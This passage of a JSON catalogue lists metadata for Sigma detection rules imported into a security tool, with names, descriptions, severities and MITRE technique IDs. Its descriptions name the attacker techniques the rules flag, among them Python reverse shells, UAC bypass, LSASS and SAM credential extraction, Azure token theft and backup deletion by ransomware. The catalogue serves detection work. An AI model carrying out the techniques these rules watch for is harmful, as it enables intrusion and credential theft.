networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-ultraviewer-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88656cec-6c3b-487c-82c0-f73ebb805503", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_ultraviewer.yml" } }, { "id": "sigmahq-sigma-88872991-7445-4a22-90b2-a3adadb0e827", "type": "detection", "name": "Stop Windows Service Via Net.EXE", "description": "Detects the stopping of a Windows service via the \"net\" utility.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/stop-windows-service-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88872991-7445-4a22-90b2-a3adadb0e827", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_stop_service.yml" } }, { "id": "sigmahq-sigma-889719ef-dd62-43df-86c3-768fb08dc7c0", "type": "detection", "name": "Suspicious PowerShell Mailbox Export to Share", "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-mailbox-export-to-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "889719ef-dd62-43df-86c3-768fb08dc7c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_mailboxexport_share.yml" } }, { "id": "sigmahq-sigma-88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "type": "detection", "name": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-rundll32-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" } }, { "id": "sigmahq-sigma-88a87a10-384b-4ad7-8871-2f9bf9259ce5", "type": "detection", "name": "Suspicious Regsvr32 Execution From Remote Share", "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-regsvr32-execution-from-remote-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_remote_share.yml" } }, { "id": "sigmahq-sigma-88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", "type": "detection", "name": "File Time Attribute Change", "description": "Detect file time attribute change to hide new or changes to existing files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-time-attribute-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml" } }, { "id": "sigmahq-sigma-88d6e60c-759d-4ac1-a447-c0f1466c2d21", "type": "detection", "name": "Chromium Browser Instance Executed With Custom Extension", "description": "Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1176.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/chromium-browser-instance-executed-with-custom-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88d6e60c-759d-4ac1-a447-c0f1466c2d21", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml" } }, { "id": "sigmahq-sigma-88f0884b-331d-403d-a3a1-b668cf035603", "type": "detection", "name": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ad-groups-or-users-enumeration-using-powershell-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88f0884b-331d-403d-a3a1-b668cf035603", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" } }, { "id": "sigmahq-sigma-88f46b67-14d4-4f45-ac2c-d66984f22191", "type": "detection", "name": "Renamed Microsoft Teams Execution", "description": "Detects the execution of a renamed Microsoft Teams binary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-microsoft-teams-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88f46b67-14d4-4f45-ac2c-d66984f22191", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_msteams.yml" } }, { "id": "sigmahq-sigma-88f680b8-070e-402c-ae11-d2914f2257f1", "type": "detection", "name": "PowerShell Base64 Encoded IEX Cmdlet", "description": "Detects usage of a base64 encoded \"IEX\" cmdlet in a process command line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-base64-encoded-iex-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "88f680b8-070e-402c-ae11-d2914f2257f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml" } }, { "id": "sigmahq-sigma-894a8613-cf12-48b3-8e57-9085f54aa0c3", "type": "detection", "name": "Potential Base64 Encoded User-Agent", "description": "Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-base64-encoded-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "894a8613-cf12-48b3-8e57-9085f54aa0c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_susp_base64.yml" } }, { "id": "sigmahq-sigma-89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", "type": "detection", "name": "Malicious PowerShell Commandlets - ScriptBlock", "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1482", "T1087", "T1087.001", "T1087.002", "T1069.001", "T1069.002", "T1069", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-powershell-commandlets-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" } }, { "id": "sigmahq-sigma-898d5fc9-fbc3-43de-93ad-38e97237c344", "type": "detection", "name": "AppX Package Deployment Failed Due to Signing Requirements", "description": "Detects an appx package deployment / installation with the error code \"0x80073cff\" which indicates that the package didn't meet the signing requirements.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/appx-package-deployment-failed-due-to-signing-requirements.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "898d5fc9-fbc3-43de-93ad-38e97237c344", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_appx_package_deployment_failed_signing_requirements.yml" } }, { "id": "sigmahq-sigma-899133d5-4d7c-4a7f-94ee-27355c879d90", "type": "detection", "name": "Python Inline Command Execution", "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-inline-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "899133d5-4d7c-4a7f-94ee-27355c879d90", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml" } }, { "id": "sigmahq-sigma-89a9a0e0-f61a-42e5-8957-b1479565a658", "type": "detection", "name": "UAC Bypass WSReset", "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-wsreset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" } }, { "id": "sigmahq-sigma-89bb1f97-c7b9-40e8-b52b-7d6afbd67276", "type": "detection", "name": "Local Groups Discovery - MacOs", "description": "Detects enumeration of local system groups", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-groups-discovery-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_local_groups.yml" } }, { "id": "sigmahq-sigma-89c42960-f244-4dad-9151-ae9b1a3287a2", "type": "detection", "name": "Suspicious File Write to Webapps Root Directory", "description": "Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.\nThis may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-write-to-webapps-root-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "89c42960-f244-4dad-9151-ae9b1a3287a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_file_write_in_webapps_root.yml" } }, { "id": "sigmahq-sigma-89ca78fd-b37c-4310-b3d3-81a023f83936", "type": "detection", "name": "Schtasks Creation Or Modification With SYSTEM Privileges", "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/schtasks-creation-or-modification-with-system-privileges.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_system.yml" } }, { "id": "sigmahq-sigma-89f75308-5b1b-4390-b2d8-d6b2340efaf8", "type": "detection", "name": "Windows Backup Deleted Via Wbadmin.EXE", "description": "Detects the deletion of backups or system state backups via \"wbadmin.exe\".\nThis technique is used by numerous ransomware families and actors.\nThis may only be successful on server platforms that have Windows Backup enabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-backup-deleted-via-wbadmin-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wbadmin_delete_backups.yml" } }, { "id": "sigmahq-sigma-8a1b2c3d-4e5f-6789-abcd-ef1234567890", "type": "detection", "name": "PUA - Memory Dump Mount Via MemProcFS", "description": "Detects execution of MemProcFS a memory forensics tool with the '-device' parameter.\nMemProcFS mounts physical memory as a virtual file system, allowing direct access to process memory and system structures.\nThreat actors were seen abusing this utility to mount memory dumps and then extract sensitive information from processes like LSASS or extract registry hives to obtain credentials, LSA secrets, SAM data, and cached domain credentials.\nMemProcFS usage that is not part of authorized forensic analysis should be treated as suspicious and warrants further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1003.001", "T1003.004", "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-memory-dump-mount-via-memprocfs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a1b2c3d-4e5f-6789-abcd-ef1234567890", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_memprocfs.yml" } }, { "id": "sigmahq-sigma-8a3038e8-9c9d-46f8-b184-66234a160f6f", "type": "detection", "name": "Potential Remote Desktop Tunneling", "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remote-desktop-tunneling.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml" } }, { "id": "sigmahq-sigma-8a4519e8-e64a-40b6-ae85-ba8ad2177559", "type": "detection", "name": "Renamed BrowserCore.EXE Execution", "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-browsercore-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml" } }, { "id": "sigmahq-sigma-8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", "type": "detection", "name": "Group Has Been Deleted Via Groupdel", "description": "Detects execution of the \"groupdel\" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/group-has-been-deleted-via-groupdel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_groupdel.yml" } }, { "id": "sigmahq-sigma-8a582fe2-0882-4b89-a82a-da6b2dc32937", "type": "detection", "name": "Suspicious WmiPrvSE Child Process", "description": "Detects suspicious and uncommon child processes of WmiPrvSE", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1204.002", "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-wmiprvse-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-8a63cdd4-6207-414a-85bc-7e032bd3c1a2", "type": "detection", "name": "AWS RDS Master Password Change", "description": "Detects the change of database master password. It may be a part of data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-rds-master-password-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_rds_change_master_password.yml" } }, { "id": "sigmahq-sigma-8a670c6d-7189-4b1c-8017-a417ca84a086", "type": "detection", "name": "Suspicious SQL Error Messages", "description": "Detects SQL error messages that indicate probing for an injection attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-sql-error-messages.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a670c6d-7189-4b1c-8017-a417ca84a086", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/sql/app_sqlinjection_errors.yml" } }, { "id": "sigmahq-sigma-8a7e90c5-fe6e-45dc-889e-057fe4378bd9", "type": "detection", "name": "HackTool - SysmonEOP Execution", "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sysmoneop-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sysmoneop.yml" } }, { "id": "sigmahq-sigma-8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "type": "detection", "name": "Schtasks From Suspicious Folders", "description": "Detects scheduled task creations that have suspicious action command and folder combinations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/schtasks-from-suspicious-folders.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_folder_combos.yml" } }, { "id": "sigmahq-sigma-8ac03a65-6c84-4116-acad-dc1558ff7a77", "type": "detection", "name": "Sysmon Configuration Change", "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-configuration-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/sysmon/sysmon_config_modification.yml" } }, { "id": "sigmahq-sigma-8ad1600d-e9dc-4251-b0ee-a65268f29add", "type": "detection", "name": "AWS Root Credentials", "description": "Detects AWS root account usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-root-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ad1600d-e9dc-4251-b0ee-a65268f29add", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_root_account_usage.yml" } }, { "id": "sigmahq-sigma-8ae51330-899c-4641-8125-e39f2e07da72", "type": "detection", "name": "DNS TXT Answer with Possible Execution Strings", "description": "Detects strings used in command execution in DNS TXT Answer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-txt-answer-with-possible-execution-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ae51330-899c-4641-8125-e39f2e07da72", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 